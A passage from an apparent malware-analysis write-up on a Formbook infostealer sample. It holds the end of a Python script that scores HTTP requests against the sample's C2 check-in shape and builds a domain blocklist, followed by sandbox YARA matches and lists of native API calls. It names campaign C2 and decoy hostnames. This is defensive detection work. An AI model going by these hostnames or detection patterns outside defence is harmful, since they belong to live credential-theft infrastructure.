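        hosts.update({decoy, "www." + decoy})
    return hosts


def classify_host(host, config):
    """Return 'c2', 'decoy' or None for a Host header value."""
    c2_host, _ = c2_host_and_path(config)
    bare = host.lower().removeprefix("www.")
    if bare == c2_host.removeprefix("www."):
        return "c2"
    if bare in config["decoy"]:
        return "decoy"
    return None


def parse_request(raw):
    """Minimal HTTP/1.x request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": parse_qs(url.query),
            "headers": headers, "body": body}


def hosts_in_string(s):
    """Hostnames from one recovered memory string, in order of appearance."""
    return HOST_RE.findall(s)


def triage(raw, config):
    """Score one request against the shape of the observed check-in."""
    req = parse_request(raw)
    _, campaign_path = c2_host_and_path(config)
    hdr = req["headers"]
    flags = {
        "host_class": classify_host(hdr.get("host", ""), config),
        "campaign_path": req["path"] == campaign_path,
        "no_user_agent": "user-agent" not in hdr,
        "connection_close": hdr.get("connection", "").lower() == "close",
        "get_with_body": req["method"] == "GET" and len(req["body"]) > 0,
        "two_query_params": len(req["query"]) == 2,
    }
    flags["score"] = sum(v is True for v in flags.values()) + (
        flags["host_class"] is not None)
    return flags


if __name__ == "__main__":
    print(json.dumps(triage(REQUEST, CONFIG), indent=2))
    print(len(watchlist(CONFIG)), "hostnames for the blocklist")
    print(hosts_in_string("http://www.liamcollinai.com/na10/www.nona23.lat"))
```

A decoy hit is deliberately scored the same as a C2 hit: the report itself shows the sample resolving www.osthirmaker.com and checking in to www.nftees.tech, both decoys, with the identical URI. Blocking only www.liamcollinai.com therefore misses most of the beaconing; feed the whole watchlist to DNS or proxy blocking and alert on the request shape (campaign path, missing User-Agent, GET with a null body) regardless of host.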

E-Banking Fraud

Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk, 4_2_014C2B60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_014C2BF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AD0 NtReadFile,LdrInitializeThunk, 4_2_014C2AD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_014C2D10
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_014C2D30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_014C2DD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_014C2DF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_014C2C70
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_014C2CA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F30 NtCreateSection,LdrInitializeThunk, 4_2_014C2F30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FE0 NtCreateFile,LdrInitializeThunk, 4_2_014C2FE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F90 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_014C2F90
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FB0 NtResumeThread,LdrInitializeThunk, 4_2_014C2FB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_014C2E80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_014C2EA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C4340 NtSetContextThread, 4_2_014C4340
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C4650 NtSuspendThread, 4_2_014C4650
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BE0 NtQueryValueKey, 4_2_014C2BE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B80 NtQueryInformationFile, 4_2_014C2B80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2BA0 NtEnumerateValueKey, 4_2_014C2BA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AF0 NtWriteFile, 4_2_014C2AF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2AB0 NtWaitForSingleObject, 4_2_014C2AB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2D00 NtSetInformationFile, 4_2_014C2D00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2DB0 NtEnumerateKey, 4_2_014C2DB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C60 NtCreateKey, 4_2_014C2C60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2C00 NtQueryInformationProcess, 4_2_014C2C00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CC0 NtQueryVirtualMemory, 4_2_014C2CC0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2CF0 NtOpenProcess, 4_2_014C2CF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2F60 NtCreateProcessEx, 4_2_014C2F60
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2FA0 NtQuerySection, 4_2_014C2FA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2E30 NtWriteVirtualMemory, 4_2_014C2E30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2EE0 NtQueueApcThread, 4_2_014C2EE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3010 NtOpenDirectoryObject, 4_2_014C3010
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3090 NtSetValueKey, 4_2_014C3090
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C35C0 NtCreateMutant, 4_2_014C35C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C39B0 NtGetContextThread, 4_2_014C39B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3D70 NtOpenThread, 4_2_014C3D70
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C3D10 NtOpenProcessToken, 4_2_014C3D10
Source: C:\Windows\explorer.exe Code function: 7_2_09258232 NtCreateFile, 7_2_09258232
Source: C:\Windows\explorer.exe Code function: 7_2_09259E12 NtProtectVirtualMemory, 7_2_09259E12
Source: C:\Windows\explorer.exe Code function: 7_2_09259E0A NtProtectVirtualMemory, 7_2_09259E0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014E0F0 GetCurrentProcess,NtQueryInformationProcess,QuirkIsEnabled,#90,InitOnceExecuteOnce,#157, 9_2_0014E0F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A3774 GetCurrentProcess,NtSetInformationProcess, 9_2_001A3774
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001A37AC NtQuerySystemInformation, 9_2_001A37AC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00147E90 NtQueryInformationToken,HeapAlloc,memset,NtQueryInformationToken,RtlInitUnicodeString,RtlCompareUnicodeString,RtlNtStatusToDosErrorNoTeb,RtlNtStatusToDosErrorNoTeb,HeapFree, 9_2_00147E90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C60 NtCreateKey,LdrInitializeThunk, 9_2_040C2C60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_040C2C70
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_040C2CA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_040C2D10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DD0 NtDelayExecution,LdrInitializeThunk, 9_2_040C2DD0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_040C2DF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_040C2EA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F30 NtCreateSection,LdrInitializeThunk, 9_2_040C2F30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FE0 NtCreateFile,LdrInitializeThunk, 9_2_040C2FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AD0 NtReadFile,LdrInitializeThunk, 9_2_040C2AD0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2B60 NtClose,LdrInitializeThunk, 9_2_040C2B60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_040C2BE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_040C2BF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C35C0 NtCreateMutant,LdrInitializeThunk, 9_2_040C35C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C4650 NtSuspendThread, 9_2_040C4650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C4340 NtSetContextThread, 9_2_040C4340
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2C00 NtQueryInformationProcess, 9_2_040C2C00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CC0 NtQueryVirtualMemory, 9_2_040C2CC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2CF0 NtOpenProcess, 9_2_040C2CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D00 NtSetInformationFile, 9_2_040C2D00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2D30 NtUnmapViewOfSection, 9_2_040C2D30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2DB0 NtEnumerateKey, 9_2_040C2DB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2E30 NtWriteVirtualMemory, 9_2_040C2E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2E80 NtReadVirtualMemory, 9_2_040C2E80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2EE0 NtQueueApcThread, 9_2_040C2EE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F60 NtCreateProcessEx, 9_2_040C2F60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2F90 NtProtectVirtualMemory, 9_2_040C2F90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FA0 NtQuerySection, 9_2_040C2FA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2FB0 NtResumeThread, 9_2_040C2FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AB0 NtWaitForSingleObject, 9_2_040C2AB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040C2AF0 NtWriteFile, 9_2_040C2AF0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07685CA0 CreateProcessAsUserW, 0_2_07685CA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA65E8 0_2_00EA65E8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA74D8 0_2_00EA74D8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EABF44 0_2_00EABF44
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EA2968 0_2_00EA2968
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_00EABFB1 0_2_00EABFB1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07211C68 0_2_07211C68
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721C4AD 0_2_0721C4AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721C4E0 0_2_0721C4E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721D98D 0_2_0721D98D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0721D9C8 0_2_0721D9C8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07567750 0_2_07567750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569360 0_2_07569360
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B368 0_2_0756B368
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569A88 0_2_07569A88
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B940 0_2_0756B940
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756A459 0_2_0756A459
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756E801 0_2_0756E801
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07569350 0_2_07569350
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756B336 0_2_0756B336
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07568721 0_2_07568721
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F798 0_2_0756F798
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F7A8 0_2_0756F7A8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756C210 0_2_0756C210
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756C201 0_2_0756C201
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756CE08 0_2_0756CE08
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756DAD0 0_2_0756DAD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D6B0 0_2_0756D6B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756EAB0 0_2_0756EAB0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756EAA2 0_2_0756EAA2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D6A0 0_2_0756D6A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F140 0_2_0756F140
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756F130 0_2_0756F130
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756CDF8 0_2_0756CDF8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D478 0_2_0756D478
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D468 0_2_0756D468
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07560006 0_2_07560006
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0756D0F8 0_2_0756D0F8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680FDA 0_2_07680FDA
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07689E30 0_2_07689E30
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684B59 0_2_07684B59
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680220 0_2_07680220
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686238 0_2_07686238
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680040 0_2_07680040
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07683EA0 0_2_07683EA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07683E91 0_2_07683E91
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_076845C0 0_2_076845C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_076845D0 0_2_076845D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_0768B470 0_2_0768B470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07682CE0 0_2_07682CE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07682CD0 0_2_07682CD0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686B1F 0_2_07686B1F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684B88 0_2_07684B88
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07686231 0_2_07686231
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680210 0_2_07680210
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07680006 0_2_07680006
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07684099 0_2_07684099
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B725C8 0_2_07B725C8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B7A924 0_2_07B7A924
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B725B8 0_2_07B725B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07B7C4F0 0_2_07B7C4F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CD2708 0_2_07CD2708
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDD648 0_2_07CDD648
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDD639 0_2_07CDD639
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDC0D0 0_2_07CDC0D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07211C51 0_2_07211C51
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01518158 4_2_01518158
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480100 4_2_01480100
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015481CC 4_2_015481CC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015441A2 4_2_015441A2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015501AA 4_2_015501AA
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A352 4_2_0154A352
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015503E6 4_2_015503E6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015102C0 4_2_015102C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01550591 4_2_01550591
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01542446 4_2_01542446
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534420 4_2_01534420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153E4F6 4_2_0153E4F6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4750 4_2_014B4750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148C7C0 4_2_0148C7C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AC6E0 4_2_014AC6E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155A9A6 4_2_0155A9A6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149A840 4_2_0149A840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01492840 4_2_01492840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE8F0 4_2_014BE8F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014768B8 4_2_014768B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154AB40 4_2_0154AB40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01546BD7 4_2_01546BD7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 4_2_0148EA80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149AD00 4_2_0149AD00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152CD1F 4_2_0152CD1F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148ADE0 4_2_0148ADE0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A8DBF 4_2_014A8DBF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490C00 4_2_01490C00
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480CF2 4_2_01480CF2
